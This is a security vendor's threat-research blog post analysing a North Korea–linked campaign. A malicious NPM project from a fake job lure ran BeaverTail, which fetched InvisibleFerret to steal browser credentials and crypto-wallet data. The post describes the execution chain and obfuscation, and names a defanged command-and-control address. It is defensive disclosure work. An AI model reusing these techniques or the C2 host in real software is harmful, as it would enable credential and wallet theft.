How to Cut Through the Noise and Understand MDR Pricing
Blog How to Cut Through the Noise and Understand MDR Pricing BY Greg Crowley November 25, 2024 | 15
Blog
How to Cut Through the Noise and Understand MDR Pricing
BY eSentire Threat Response Unit (TRU)
November 14, 2024 | 13 MINS READ
Attacks/Breaches
Threat Intelligence
Threat Response Unit
TRU Positive/Bulletin
Want to learn more on how to achieve Cyber Resilience?
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
What did we find?
In October 2024, the eSentire Threat Response Unit (TRU) responded to an incident where a software developer downloaded a JavaScript project that contained BeaverTail malware. Upon installing the project through the Node Package Manager (NPM) command, it executed malicious JavaScript files and subsequently deployed the InvisibleFerret malware to the host. The InvisibleFerret malware was executed through a Python command, which fingerprinted the host’s information and stole the browser’s credentials.
In response, our team of 24/7 SOC Cyber Analysts responded by isolating the impacted host and alerting the customer with the relevant details.
Upon further investigation by eSentire’s TRU team, it was determined that the observed Tactics, Techniques, and Procedures (TTPs) were consistent with those reported to be used by North Korea threat actors, also tracked as Contagious Interview.
Initial Access
A ZIP file named ‘task-space-eshop-aeea6cc51a7c.zip’ was found in the user’s download directory. eSentire Threat Intelligence team assesses the chances as probable that the victim downloaded the zip from a BitBucket project named “eshop” (Figure 1).
Figure 1 eshop project hosted on Bitbucket.
The malicious “eshop” repository was committed by the user “francesco zaid” (Figure 2).
Figure 2 Author “francesco zaid” (screenshot taken October 24th, 2024).
The commits to eshop occurred roughly five days after a job posting for a freelancer was published on a freelance job board. The job was posted by a user named “francesco zaid” on the “www.freelancermap[.]com” (Figure 3).
Figure 3 Possible Fake Job posting associated with the Contagious Interview Campaign.
It should be noted that the eSentire Threat Intelligence team reviewed the job posting and was unable to find a direct link to the eshop repository from the posting; however, given the contact person’s name being the same name used to upload content to the repository, it is a notable finding and is consistent with the Contagious Interview campaign Tactics, Techniques and Procedures (TTPs) of luring software developers with fraudulent jobs.
The victim in the incident eSentire responded to appears to be a software developer, which aligns with the TTPs of previously reported on campaigns by North Korean threat actors where software developers were targeted.
Execution Chain
The ZIP file downloaded by the victim contained a malicious NPM package that once installed by the victim, executed “server.js” file that is defined in the “package.json” and subsequently, loads a malicious JavaScript file (error.js) (Figure 4).
Figure 4 “server.js” file was defined to be executed in the “package.json” file
The “server.js” file is used as an entry point to load the file located in “backend/middlewares/helpers/error.js”, which facilitates further malicious activities on the victim machine such as: steal saved login credentials in the browsers; collect system information; enumerates crypto wallet extensions in the targeted browsers; and, steal configuration data from crypto wallets like Exodus and Solana. This JavaScript file (error.js) is highly obfuscated and after analysis it was determined to be a component for the Beavertail malware (Figure 5).
Figure 5 Screenshot of ‘error.js’ found on the BitBucket Repository that is a component of BeaverTail.
After the JavaScript file is loaded, it uses a cURL command to download InvisibleFerret malware components from a command and control (C2) server; in this case the C2 was located at 185[.]235[.]241[.]208[:]1224. BeaverTail then downloads the initial Python script of InvisibleFerret. It is saved on the victim machine as “.sysinfo” file in the victim’s home directory (Figure 6).
Figure 6 Initial BeaverTail Python Script that Fetches InvisibleFerret.
Once the file “.sysinfo” is downloaded onto the machine, InvisibleFerret’s loader file “.sysinfo” is then executed with the command “C:\Users\{username}\.pyp\python.exe” “C:\Users\{username}/.sysinfo”. It’s worth noting that this observation is different from what was reported by Unit 42 where the initial Python script was named “.npl”.
It’s also worth noting that a total of 21 crypto extensions were targeted by the BeaverTail in our observed sample; the full list can be found in the Appendix at the end of the blog (Figure 7).
Figure 7 Crypto Wallet Browser Extensions Targeted by BeaverTail.
Analysis of InvisibleFerret Python Files
The eSentire Threat Intelligence team conducted analysis of four Python files that were dropped in the incident; one loader (.sysinfo in this instance) and three payloads stored under “\.n2” folder in the user’s home directory (Figure 8).
Table 1: Observed Invisible Ferret Python File Locations
|
Request URL
|
Note
|
TABLE HEADER 4
|
|---|---|---|
Loader Component Overview
Figure 8 Python Loader (.sysinfo) Parameters (commented line was included).
It’s worth noting that the internal IP address (10.10.51.212) was excluded from the initial loader script, but still reappears in the various InvisibleFerret python payloads (Figure 8). This suggests that the IP address may be used for testing purposes. Furthermore, our analysis revealed that excluded or commented-out code sections are a common trait of these scripts, potentially indicative of the malware’s development or testing stages.
The sample downloads three distinct payloads which are appended with a campaign ID and sub ID (sType and gType respectively, as seen in Figure 8 above and Figure 9 below): pay_campaignid_subid.py; brow_campaignid_subid.py; and, mlip_campaignid_subid.py. On disk these files are saved to the %USERPROFILE%\.n2 path without these identifiers or file extensions (Figure 9).
Figure 9 InvisibleFerret Python Files.
Some of these files are obfuscated with a combination of zlib, base64 and reverse string order (Figure 10). The script loops through the lambda function continuously until the final cleartext payload is executed.
eSentire Threat Response Unit (TRU)
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
Read the Latest from eSentire
By Theodore NguyenARE YOU EXPERIENCING A SECURITY INCIDENT OR HAVE YOU BEEN BREACHED?
Call 1-866-579-2200